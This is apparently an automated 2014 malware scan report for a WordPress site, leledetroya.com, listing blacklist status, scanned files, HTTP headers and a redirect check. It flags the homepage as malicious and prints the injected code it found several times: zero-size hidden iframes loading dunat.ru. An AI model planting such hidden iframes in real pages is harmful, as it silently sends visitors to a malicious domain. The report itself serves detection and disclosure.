Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=leledetroya.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://leledetroya.com/ | HTTP/1.1 301 Moved Permanently Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 29 Jun 2014 19:23:08 GMT Pragma: no-cache Location: http://www.leledetroya.com/ Server: Apache/2.2.16 (Debian) Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html; charset=UTF-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: PHPSESSID=iqhrr8stbmgtj38nj6nnc5e9m4; path=/ X-Pingback: http://www.leledetroya.com/xmlrpc.php X-Powered-By: PHP/5.3.3-7+squeeze19 | clean |
http://www.leledetroya.com/ | 200 OK Content-Length: 22747 Content-Type: text/html | malicious |
Page code contains blacklisted domain: dunat.ru ...[9552 bytes skipped]... e:hover, a.read-more:active, a.read-more:focus, .widget a:hover, .widget a:focus, .widget a:active{ color:#824328; } a#scroll-top:hover, .button, button, input[type="submit"], input[type="reset"], input[type="button"], a.readmore, .single-menu-item .price:hover span, .es-carousel li:hover .price span, .our-menu #main-content article:hover .price span { background-color:#824328; } </style> <iframe src="http://dunat.ru/" width=0 height=0></iframe><iframe src="http://dunat.ru/" width=0 height=0></iframe></head> <body class="home blog"> <!-- Start wrap --> <div id="page-content-wrap"> <!-- Start Header --> <div id="header-wrapper"> <he ...[15262 bytes skipped]... Malicious iFrame found. size: 0x0 src: http://dunat.ru/ This URL is marked by Google as suspicious <iframe src="http://dunat.ru/" width=0 height=0> | ||
http://www.leledetroya.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ajax.js?ver=3.9.1 | 200 OK Content-Length: 33 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-includes/js/jquery/jquery.js?ver=1.11.0 | 200 OK Content-Length: 96402 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.2.1 | 200 OK Content-Length: 7199 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/persist.js?ver=3.9.1 | 200 OK Content-Length: 24995 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/store.js?ver=3.9.1 | 200 OK Content-Length: 5337 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/ajax/static/ngg_store.js?ver=3.9.1 | 200 OK Content-Length: 891 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/layersliderwp-v.5.0.2/static/js/layerslider.kreaturamedia.jquery.js?ver=5.0.2 | 200 OK Content-Length: 56751 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/layersliderwp-v.5.0.2/static/js/greensock.js?ver=1.11.2 | 200 OK Content-Length: 52295 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/layersliderwp-v.5.0.2/static/js/layerslider.transitions.js?ver=5.0.2 | 200 OK Content-Length: 21095 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/plugins/nextgen-gallery/products/photocrati_nextgen/modules/lightbox/static/lightbox_context.js?ver=3.9.1 | 200 OK Content-Length: 890 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/themes/elegantia-theme/js/elastislide/jquery.easing.1.3.js?ver=1.3 | 200 OK Content-Length: 8097 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/themes/elegantia-theme/js/elastislide/jquery.elastislide.js?ver=1.0 | 200 OK Content-Length: 12448 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/themes/elegantia-theme/js/prettyphoto/jquery.prettyPhoto.js?ver=3.1.4 | 200 OK Content-Length: 25232 Content-Type: application/javascript | clean |
http://www.leledetroya.com/wp-content/themes/elegantia-theme/js/jquery.validate.min.js?ver=1.10.0 | 200 OK Content-Length: 21601 Content-Type: application/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: leledetroya.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 29 Jun 2014 19:23:08 GMT
Pragma: no-cache
Location: http://www.leledetroya.com/
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=iqhrr8stbmgtj38nj6nnc5e9m4; path=/
X-Pingback: http://www.leledetroya.com/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze19
...0 bytes of data.
GET / HTTP/1.1
Host: leledetroya.com
Result:
HTTP/1.1 301 Moved Permanently
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 29 Jun 2014 19:23:08 GMT
Pragma: no-cache
Location: http://www.leledetroya.com/
Server: Apache/2.2.16 (Debian)
Vary: Accept-Encoding
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=iqhrr8stbmgtj38nj6nnc5e9m4; path=/
X-Pingback: http://www.leledetroya.com/xmlrpc.php
X-Powered-By: PHP/5.3.3-7+squeeze19
...0 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: leledetroya.com
Referer: http://www.google.com/search?q=leledetroya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: leledetroya.com
Referer: http://www.google.com/search?q=leledetroya.com
Result:
The result is similar to the first query. There are no suspicious redirects found.